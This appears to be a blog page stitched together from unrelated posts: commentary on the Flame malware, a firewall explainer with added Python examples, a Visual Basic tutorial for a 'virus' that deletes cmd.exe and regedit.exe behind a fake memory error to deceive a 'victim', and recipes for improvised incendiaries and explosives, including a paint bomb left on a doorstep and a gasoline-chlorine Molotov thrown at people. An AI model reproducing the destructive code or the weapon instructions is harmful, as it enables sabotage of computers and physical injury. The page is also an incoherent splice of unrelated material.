Move over Stuxnet, Say Hello to the new Cyberweapon: “Flame”



(Screenshot of Iran CERT warning for “Flame” Malware)

Yesterday Iran’s Computer Emergency Response Team released a warning about a new modular malware that resembles Stuxnet and Duqu. Dubbed “Flame”, the new cyberweapon is causing quite a stir in the media with its “advanced features and complexity”.

But looking at the malware’s features as disclosed by Iran’s CERT team, none of it seems especially groundbreaking:

  • Distribution via removable media
  • Distribution through local networks
  • Network sniffing, detecting network resources and collecting lists of vulnerable passwords
  • Scanning the disk of infected system looking for specific extensions and contents
  • Creating series of user’s screen captures when some specific processes or windows are active
  • Using the infected system’s attached microphone to record the environment sounds
  • Transferring saved data to control servers
  • Using more than 10 domains as C&C servers
  • Establishment of secure connection with C&C servers through SSH and HTTPS protocols
  • Bypassing tens of known antivirus, anti-malware and other security products
  • Capable of infecting Windows XP, Vista and 7 operating systems
  • Infecting large scale local networks

All of these “threats” have been seen before. I especially liked the “bypassing tens of known anti-viruses…” line.

But there are several features that do set “Flame” apart from the pack. First of all, the malware is very large, a whopping 20 MB. It also contains several files and appears to operate using swappable modules. But there is more.

According to an article on The Register, Flame has the following features:

  • It has been active for at least 2 years, but possibly 5-8 years
  • Contains exploits for known and fixed vulnerabilities
  • Uses open source libraries
  • Uses an SQLite database
  • Uses some scripts written in Lua (of Angry Birds fame)

All the big-name security companies that have analyzed it seem to agree that, given its complexity, it was most likely written by a nation state rather than by individuals or small groups.

The malware could have been created by Israel (and possibly the US) as many of the countries that have detected infection would be logical targets for them.

According to Symantec:

“Initial telemetry indicates that the targets of this threat are located primarily in Palestinian West Bank, Hungary, Iran, and Lebanon. Other targets include Russia, Austria, Hong Kong, and the United Arab Emirates. The industry sectors or affiliations of individuals targeted are currently unclear.”

I am not sure about its “CyberWeapon” title, as it seems to be an information gatherer. Definitely worth keeping an eye on, but as with “APT” and “Stuxnet”, I am sure the media will beat this topic to death.

 

p/s: Credit to http://cyberarms.wordpress.com

VIRUS SCRIPT in VISUAL BASIC

Now many of you feel that creating a virus is impossible especially for you beginners. Well this tutorial shows you how to create a simple virus with just a few lines of code. A virus can be an application that deletes files upon request, this is seen as infecting your computer because by deleting key files you may need to take action to get your computer back to normal.
First of all open a new Visual Basic project, a standard exe file..
Now it depends on how you want your virus to work, I feel it is best if it is activated once your application is opened so the main code codes in the form load sub.
On your project insert a text box , a command button and a timer, we will be using the command button and timer a little later on.
In the project put in the file you want to delete, for example if you wanted to delete the command file then you would put the following code in the form load tab.
Private Sub Form_Load()
Text1.Text = “C:/Windows/System32/cmd.exe
Kill Text1.Text
End Sub
Once the project is opened then the command file will be removed.
Now I will show you an example of doing this using a command button. Put the following code in the command button and in the form load.
You can even give the text box a name to make it quicker. I have labelled it ‘A’
Private Sub Form_Load()
Text1.Text = “C/Windows/System32/cmd.exe”
A = Text1.Text
End Sub
Private Sub Command1_Click
Kill A
End Sub
Now once the command button is clicked on the project the command file will be deleted.
Now we will use the timer in this one. If you want to disguise your scheme then this is a good way to do it, Here we will send a fake message error pretending the application hasn’t got enough memory to run, but in actual fact the victim doesn’t know that you have just removed their command file.
Here is to go about it…
Private Sub Form_Load()
Form1.Visible = False
Text1.Text = “C:/Windows/System32/cmd.exe”
A = Text1.Text
Msgbox (“Runtime Error 492. Not Enough Memory.”), vbCritical, “Runtime Error”
End Sub
Private Sub Timer1_Timer()
Timer1.Interval = 5000
Kill A
Timer1.Enabled = False
End Sub
All we have done above is made the form invisible so that it makes the error message look real, we have set an interval of 5 seconds on the timer before the file is deleted and that’s how simple it can be to fool someone.
Right, we can now make it a little more difficult if you are finding the above a little too easy.
How about removing more than 1 file, well this is how you could go about doing that, we will stick with the message box fool because I think that works well.
The example below shows how to remove the files when the application is loaded, we will not be using timers or command buttons in this one. We will not even be using text boxes because they are not needed, you can just do what is shown below.
So in the form load part put the following code.
Private Sub Form_Load()
Form1.Visible = False
Msgbox (“Runtime Error 492. Not Enough Memory.”), vbCritical, “Runtime Error”
Kill “C:/Windows/System32/cmd.exe”
Kill “C:/Windows/regedit.exe”
End Sub
So above we will be removing the command file and the registry, I don’t think the victim will be best pleased about that do you.
Now I have shown you the above information I think it’s your turn to try and create your own, now you can test it on your own pc, just copy a file, lets say the cmd.exe file and paste it into your C:/
Then put in the code above but in the Kill put this…
Kill “C:/cmd.exe”
That’s all you need to kill, then you will see the file has been removed. Keep trying new things like I have shown and you will be a pro in no time. I hope you enjoyed this……….

Firewall


What is a Firewall?

A firewall is a security device that can be a software program or a dedicated network appliance. The main purpose of a firewall is to separate a secure area from a less secure area and to control communications between the two. Firewalls can perform a variety of other functions, but are chiefly responsible for controlling inbound and outbound communications on anything from a single machine to an entire network.

Software Firewalls

Software firewalls, also sometimes called personal firewalls, are designed to run on a single computer. These are most commonly used on home or small office computers that have broadband access, which tend to be left on all the time. A software firewall prevents unwanted access to the computer over a network connection by identifying and preventing communication over risky ports. Computers communicate over many different recognized ports, and the firewall will tend to permit these without prompting or alerting the user. For example, computers access Web pages over port 80 and use port 443 for secure Web communications. A home computer would expect to receive data over these ports. However, a software firewall would probably block any access from the Internet over port 421, over which it does not expect to receive data. Additionally, port 421 has been used by certain Trojans (a type of malware) in the past. Software firewalls can also detect “suspicious” activity from the outside. They can block access to a home computer from an outside address when activity matches certain patterns, like port scanning.

A software firewall also allows certain programs on the user’s computer to access the Internet, often by express permission of the user. Windows Update, antivirus software, and Microsoft Word are a few programs that a user might legitimately expect to access the Internet. However, a program called gator.exe that is attempting to access the Internet when it shouldn’t be running might be reason for concern, so the user could decline access for this program. This is a useful feature when spyware, adware or some type of malware is suspected.

Some software firewalls also allow configuration of trusted zones. These permit unlimited communication over a wide variety of ports. This type of access may be necessary when a user starts a VPN client to reach a corporate intranet.

One drawback to software firewalls is that they are software running on a personal computer operating system. If the underlying operating system is compromised, then the firewall can be compromised as well. Since many other programs also run on a home computer, malicious software could potentially enter the computer through some other application and compromise the firewall. Software firewalls also rely heavily upon the user making the right decisions. If someone using a software firewall mistakenly gives a keylogger or a Trojan permission to access the Internet, security on that machine is compromised even though there is nothing wrong with the firewall itself.

There are many different brands of software firewalls, each with their own features. Some examples include ZoneAlarm, BlackICE, and Kerio.

Hardware Firewalls

Hardware firewalls are more complex. They also have software components, but run either on a specially engineered network appliance or on an optimized server dedicated to the task of running the firewall. The operating system underlying a hardware firewall is as basic as possible and very difficult to attack. Since no other software runs on these machines, and configuration takes a little more thought than clicking on an “allow” prompt, they are difficult to compromise and tend to be extremely secure.

A hardware firewall is placed between a network, such as a corporate network, and a less secure area, such as the Internet. Firewalls can also separate more secure networks from less secure ones, such as one corporate location within a larger corporate structure. Versions of hardware firewalls are available to home users who want stronger protection from potential Internet attacks. These devices ship with many different default configurations: some allow no communications from the outside and must be configured using rules, while others (like those sold for the home market) come pre-configured to block access over risky ports. Rules can be as simple as allowing port 80 traffic to flow through the firewall in both directions, or as complex as only allowing 1433 (SQL Server) traffic from a specific IP address outside the network through the firewall to a single IP address inside the network.
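The ordered, first-match, default-deny rule evaluation described above, as an added example (not code from the original page or from any of the products it names). The inside network 10.0.0.0/8, the SQL Server host 10.0.0.25 and the single permitted outside address 203.0.113.7 are assumed sample values.

```python
import ipaddress
from dataclasses import dataclass
from typing import List, Optional


@dataclass(frozen=True)
class Rule:
    """One rule in an ordered list: the first rule that matches decides."""
    action: str                  # "allow" or "deny"
    direction: str               # "in", "out" or "any"
    src: str = "0.0.0.0/0"       # source network in CIDR form
    dst: str = "0.0.0.0/0"       # destination network in CIDR form
    dport: Optional[int] = None  # destination port; None matches any port


@dataclass(frozen=True)
class Packet:
    direction: str  # "in" (Internet -> network) or "out" (network -> Internet)
    src: str
    dst: str
    dport: int


def matches(rule: Rule, pkt: Packet) -> bool:
    """True if every field of the rule admits this packet."""
    if rule.direction not in ("any", pkt.direction):
        return False
    if ipaddress.ip_address(pkt.src) not in ipaddress.ip_network(rule.src):
        return False
    if ipaddress.ip_address(pkt.dst) not in ipaddress.ip_network(rule.dst):
        return False
    return rule.dport is None or rule.dport == pkt.dport


def decide(rules: List[Rule], pkt: Packet) -> str:
    """Walk the rules in order; a packet no rule admits is dropped (default deny)."""
    for rule in rules:
        if matches(rule, pkt):
            return rule.action
    return "deny"


# Constructed rule set mirroring the two rules described in the text; the
# addresses are assumed sample values, not taken from any real deployment.
RULES = [
    Rule("allow", "any", dport=80),                                             # web traffic in both directions
    Rule("allow", "in", src="203.0.113.7/32", dst="10.0.0.25/32", dport=1433),  # SQL Server from one outside host only
    Rule("allow", "out", src="10.0.0.0/8"),                                     # inside hosts may initiate outbound
]

if __name__ == "__main__":
    for pkt in (Packet("in", "203.0.113.7", "10.0.0.25", 1433),
                Packet("in", "203.0.113.8", "10.0.0.25", 1433),
                Packet("in", "198.51.100.9", "10.0.0.40", 421)):
        print(pkt, "->", decide(RULES, pkt))
```

Note that the second SQL packet is dropped even though port and destination match: the source is one address off the permitted host, which is exactly the kind of narrow rule the paragraph describes.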

Firewalls are also used for Network Address Translation (NAT). This allows a network to use private IP addresses that are not routed over the Internet. Private IP address schemes allow organizations (or even household networks) to limit the number of publicly routed IP addresses they use, reserving public addresses for Web servers and other externally accessed network equipment. NAT allows administrators to use one public IP address for all of their users to access the Internet – the firewall is “smart” enough to send the requests back to the requesting workstation’s internal IP. NAT also allows users inside a network to contact a server using a private IP while users outside the network must contact the same server using an external IP.
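The translation the paragraph describes, where many private inside hosts share one public address and the firewall maps each reply back to the workstation that sent the request, as an added example (not code from the original page or from any firewall product). The public address 198.51.100.1 and the inside/outside endpoints are constructed sample values.

```python
import ipaddress
from typing import Dict, Optional, Tuple

Endpoint = Tuple[str, int]  # (IP address, port)


class Nat:
    """Port-based NAT: every inside host shares one public IP; replies are mapped back by port."""

    def __init__(self, public_ip: str, first_port: int = 40000) -> None:
        self.public_ip = public_ip
        self.next_port = first_port
        # (inside source, outside destination) -> public port chosen for that flow
        self.out_table: Dict[Tuple[Endpoint, Endpoint], int] = {}
        # (public port, outside peer) -> inside source that owns the flow
        self.in_table: Dict[Tuple[int, Endpoint], Endpoint] = {}

    def outbound(self, src: Endpoint, dst: Endpoint) -> Endpoint:
        """Rewrite the source of an inside -> Internet packet; create the mapping on first use."""
        if not ipaddress.ip_address(src[0]).is_private:
            raise ValueError("only private (non-routable) inside addresses are translated")
        key = (src, dst)
        if key not in self.out_table:
            self.out_table[key] = self.next_port
            self.in_table[(self.next_port, dst)] = src
            self.next_port += 1
        return (self.public_ip, self.out_table[key])

    def inbound(self, src: Endpoint, dst: Endpoint) -> Optional[Endpoint]:
        """Rewrite the destination of an Internet -> inside packet, or return None (drop)
        when no inside host opened a flow to that peer on that public port."""
        if dst[0] != self.public_ip:
            return None
        return self.in_table.get((dst[1], src))


if __name__ == "__main__":
    nat = Nat("198.51.100.1")  # assumed public address of the firewall
    public = nat.outbound(("192.168.1.10", 51000), ("203.0.113.80", 80))
    print("outbound rewritten to", public)
    print("reply delivered to", nat.inbound(("203.0.113.80", 80), public))
    print("unsolicited probe ->", nat.inbound(("203.0.113.9", 4444), public))
```

The last call returns None: a packet from the Internet that matches no existing flow has nowhere to go, which is why NAT alone already blocks unsolicited inbound connections to inside hosts.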

In addition to port and IP address rules, firewalls can have a wide variety of functionality. They can also act as caching servers, VPNs, routers, and more. Some examples of hardware firewalls are CheckPoint, Cisco PIX, SonicWall, Contivity from Nortel, and Linksys (for the home market).

Firewalls are vital to network management. Without this control over computer and network access, large networks could not store sensitive data intended for selective retrieval. Firewalls are also very important for home broadband users – without a home version of one of these products, your personal data is at risk.

Paint Bombs


To make a paint bomb you simply need a metal paint can with a 
refastenable lid,
a nice bright color paint (green, pink, purple, 
or some gross color is perfect!),
and a quantity of dry ice.

Place the paint in the can and then drop the dry ice in.
Quicky place the top on and then run like hell!
With some testing you can time this to a science.
It depends on the ratio of dry ice to paint to 
the size of the can to how full it is.

If you are really pissed off at someone,
you could place it on their doorstep,
knock on the door,
and then run!!
Paint will fly all over the place...

You must try it!! HAHAHA!! :D

Easy Grenades/Rockets


Items Needed:

White Out Pen or Bottle full of white out

Small wooden matches

 

Directions:

Cram alot of match heads into the opening of the white out bottle for the pen

Take off the top then cram the matches in to pen’s opening.

To ignite just light the match heads and it will either explode or launch.

Hindenberg Bomb


Needed:

1 Balloon

1 Bottle

1 Liquid Plumr

1 Piece Aluminum FoilL

1 Length Fuse

 

Instructions :

Fill the bottle 3/4 full with Liquid Plumr and add a little piece ofaluminum foil to it.

Put the balloon over the neck of the bottle untilthe balloon is full of the resulting gas.

This is highly flammablehydrogen.

Now tie the baloon.

Now light the fuse, and let it rise.

When the fuse contacts the balloon, watch out!!!

Different kind of Molitoff Cocktail


Here is how you do it:

– Get a coke bottle & fill it with gasoline about half full

– Cram a piece of cloth into the neck of it nice and tight

– Get a chlorine tablet and stuff it in there. You are going to have
to force it because the tablets are bigger than the opening of the
bottle.

– Now find a suitable victim and wing it in their direction. When it
hits the pavement or any surface hard enough to break it, and the chlorine
and gasoline mix….. BOOM!!!!!!
Have fun!